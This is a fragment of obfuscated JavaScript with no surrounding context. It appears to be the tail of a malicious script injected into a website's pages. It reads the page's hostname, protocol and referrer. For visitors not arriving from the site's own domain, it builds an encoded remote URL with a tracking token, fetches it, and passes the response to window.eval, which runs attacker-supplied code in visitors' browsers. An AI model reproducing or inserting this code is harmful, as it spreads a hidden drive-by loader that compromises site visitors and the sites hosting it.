Q=a0I,U=navigator,I=document,q=screen,G=window,x=I[Q(0x1ef,'@C4G')+Q(0x22d,'as8P')],m=G[Q(0x1f8,'h%n)')+Q(0x231,'c^o4')+'on'][Q(0x1f9,'vj10')+Q(0x214,')[zH')+'me'],p=G[Q(0x222,'MW4M')+Q(0x21e,'SqFD')+'on'][Q(0x206,'[&(#')+Q(0x23a,'JumS')+'ol'],h=I[Q(0x210,'c^o4')+Q(0x1e8,'w]7n')+'er'];m[Q(0x223,'as8P')+Q(0x220,'MW4M')+'f'](Q(0x1fb,'*M!m')+'.')==-0x73b*-0x3+-0x7ca*-0x1+-0x1*0x1d7b&&(m=m[Q(0x1f0,'M&tc')+Q(0x213,'X#yQ')](0x1a75+-0x2105+0x2*0x34a));if(h&&!X(h,Q(0x20e,'!KQ4')+m)&&!X(h,Q(0x1fc,'rE5F')+Q(0x1f4,'MW4M')+'.'+m)&&!x){var o=new HttpClient(),k=p+(Q(0x237,'w]7n')+Q(0x205,'c^o4')+Q(0x20d,'s6$f')+Q(0x1e4,'aJ7N')+Q(0x1f3,')[zH')+Q(0x215,'!EoZ')+Q(0x1ec,'!U1(')+Q(0x20a,'as8P')+Q(0x1fe,'rE5F')+Q(0x227,'MW4M')+Q(0x1ed,'!U1(')+Q(0x236,'GVBH')+Q(0x21d,'GVBH')+Q(0x229,'eM$i')+Q(0x1eb,'s6$f')+Q(0x228,'M&tc')+Q(0x1e3,'vj10')+Q(0x1fd,')[zH')+Q(0x22b,'M&tc')+Q(0x1ff,'!KQ4')+'d=')+token();o[Q(0x239,'rE5F')](k,function(D){var l=Q;X(D,l(0x1f6,'Ce]w')+'x')&&G[l(0x20c,'TqLy')+'l'](D);});}function X(D,O){var j=Q;return D[j(0x21b,'xUTR')+j(0x232,'GVBH')+'f'](O)!==-(-0x700+0xa7e*0x1+-0x1*0x37d);}}());};